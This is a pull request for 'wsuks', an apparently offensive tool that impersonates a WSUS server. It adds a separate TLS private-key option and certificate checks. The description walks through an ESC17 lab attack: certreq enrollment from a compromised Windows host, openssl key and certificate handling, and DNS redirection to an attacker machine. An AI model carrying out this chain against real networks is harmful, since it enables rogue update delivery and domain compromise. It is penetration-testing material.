### PR TITLE
Added option --tls-certKey to supply cert private key

### DIFF
--- a/wsuks/lib/argparser.py
+++ b/wsuks/lib/argparser.py
@@ -47,6 +47,7 @@ def initParser():
     advanced.add_argument("--WSUS-Server", metavar="", dest="wsusHost", help="IP or DNS name of the WSUS Server.")
     advanced.add_argument("--WSUS-Port", metavar="", dest="wsusPort", type=int, help="Port of the WSUS Server. (DEFAULT: 8530 for HTTP, 8531 for HTTPS)")
     advanced.add_argument("--tls-cert", metavar="", dest="tlsCert", help="Path to a TLS certificate that is valid for the WSUS Server. Turns on HTTPS mode.")
+    advanced.add_argument("--tls-certKey", metavar="", dest="tlsCertKey", help="Path to a TLS certificate private key that is valid for the WSUS Server. Turns on HTTPS mode.")
 
     webserver = mode_parser.add_argument_group("SERVE ONLY MODE", "Only run Webserver. Recommended if you have control over DNS and the traffic comes directly from the victim to your machine.")
     webserver.add_argument("--serve-only", action="store_true", help="Serve the executable and command without any arp spoofing, network magic or WSUS discovery.")

--- a/wsuks/wsuks.py
+++ b/wsuks/wsuks.py
@@ -140,11 +140,37 @@ class Wsuks:
             if not os.path.isfile(self.args.tlsCert):
                 self.logger.error(f"TLS certificate file '{self.args.tlsCert}' not found! Exiting...")
                 exit(1)
+
+            if self.args.tlsCertKey:
+                if not os.path.isfile(self.args.tlsCertKey):
+                    self.logger.error(f"TLS certificate Key file '{self.args.tlsCertKey}' not found! Exiting...")
+                    exit(1)
+
             self.logger.info(f"Using TLS certificate '{self.args.tlsCert}' for HTTPS WSUS Server")
+            # checking if the cert has the private key baked within the cert
+            # https://docs.python.org/3/library/ssl.html#combined-key-and-certificate
+
+            if not self.args.tlsCertKey:
+                with open(self.args.tlsCert, 'r') as h:
+                    data = h.read()
+                    has_private_key = "-----BEGIN PRIVATE KEY-----" in data or "-----BEGIN RSA PRIVATE KEY-----" in data
+                    has_cert = "-----BEGIN CERTIFICATE-----" in data
+                    if has_cert and has_private_key:
+                        self.logger.warning("Private key BEGIN in the certfile is not secure separate the two and keep the private key safe")
+                    else:
+                        self.logger.error("No private key found. Supply it using --tls-certKey")
+                        # To perform TLS server authentication (decrypt/session key ops, prove ownership) the server needs the corresponding private key. The cert alone cannot do that.
+                        exit(1)
+
+            self.logger.info(f"Using TLS certificate private key '{self.args.tlsCertKey}' for HTTPS WSUS Server")
+        try:
             context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
-            context.load_cert_chain(certfile=self.args.tlsCert)
+            context.load_cert_chain(certfile=self.args.tlsCert, keyfile=self.args.tlsCertKey)
             context.check_hostname = False
             http_server.socket = context.wrap_socket(http_server.socket, server_side=True)
+        except ssl.SSLError:
+            self.logger.error("Make sure The cert in a PEM format not a DER")
+            exit(1)
 
         try:
             self.logger.info(f"Starting WSUS Server on {self.hostIp}:{self.wsusPort}...")


### PR DESCRIPTION
 Hello Neff,
 sorry for the delay 

### What changed:
This PR adds support for providing a TLS certificate private key as a separate file via the `--tls-certKey` arg.
see issue #19 for more details

### Key features:
 - If `--tls-certKey` is not provided, the code automatically checks if the certificate file contains an embedded private key (legacy format)
- Added SSL error handling with guidance to ensure certificates are in PEM format (not DER)

### How to test (simple test):

1. **Generate a self-signed certificate and private key** :
   ```bash
   openssl genrsa -out private_key.pem 2048
   openssl req -x509 -new -key private_key.pem -out certificate.pem -days 365 -nodes -subj "/"
   ```
   
   ```bash
   sudo wsuks --serve-only --tls-cert certificate.pem --tls-certKey private_key.pem  # use -I to specify the correct interface 
   ```
   
<img width="1286" height="634" alt="image" src="https://github.com/user-attachments/assets/ebc5d321-4de2-4e53-8d54-9906a0d0cde1" />


 ### How to test against ESC17 LAB:
 
 attack flow (template vulnerable for [ESC17](https://github.com/NeffIsBack/esc17-wiki/blob/master/06-%E2%80%90-Privilege-Escalation.md#esc17-enrollee-supplied-subject-for-server-authentication) --> CSR generation --> Submit CSR to CA --> Retrieve cert.pem --> (optional) Convert to PFX --> Extract cert.pem + private_key.pem --> Run wsuks with --tls-cert and --tls-certKey  )
 
### 1) Obtain CSR via enrolled user
- Have the user with enrollment rights generate a CSR that includes the desired SAN (e.g., DNS: wsus.domain.local).
- Example (OpenSSL):
```bash
openssl req -new -nodes -keyout private_key.pem -out request.csr -config openssl.config
```
<img width="536" height="211" alt="image" src="https://github.com/user-attachments/assets/e2779fec-62c4-4587-aa97-7d7321591fc5" />
if prompted type the CN again and press enter 


### 2) Submit CSR to CA and retrieve certificate
- Submit the CSR to your CA (via web enrollment, certreq, or CA API) and obtain the signed certificate (certificate.pem / cert.crt).

from compromised windows machine as user with enrollment right to ESC17
```
certreq -f -submit -attrib "CertificateTemplate:VULN_TEMPLATENAME" -config "DC01.domain.local\CertificateAuthority NAME" "PATH_TO_request.csr" "PATH_TO_Save_cert.pem" 
```
download the cert.pem to your machine and use it with the generated private key or convert it to pfx to save it and use later.

back to our attacker machine.
### 3) Convert certificate + key into PFX  (step 3 and 4 are optional. once you get cert.pem you can jump to step 5)
```bash
openssl pkcs12 -export -out certificate.pfx -inkey private_key.pem -in certificate.pem -passout pass:YOUR_PFX_PASSWORD
```

### 4) Extract cert.pem and private_key.pem from PFX
```bash
# Extract private key (PEM)
openssl pkcs12 -in certificate.pfx -nocerts -out private_key.pem -nodes -passin pass:YOUR_PFX_PASSWORD

# Extract certificate (PEM)
openssl pkcs12 -in certificate.pfx -clcerts -nokeys -out cert.pem -passin pass:YOUR_PFX_PASSWORD
```

### 5) Run wsuks with TLS cert and key
- Example invocation:
```bash
wsuks --tls-cert cert.pem --tls-certKey private_key.pem  --serve-only
```

note* in this scenario i have control over dns and was able to add machines account to domain so i pointed wsus.domain.local to machine i control


 
note** the private_key.pem you generated   with ` openssl genrsa -out private_key.pem 2048` is the same privatekey thats get extracted with `openssl pkcs12 -in certificate.pfx -nocerts -out private_key.pem -nodes -passin pass:YOUR_PFX_PASSWORD` 
 
<img width="838" height="86" alt="image" src="https://github.com/user-attachments/assets/a157ece3-ca89-4746-b72b-4446d103cb2e" />

   
   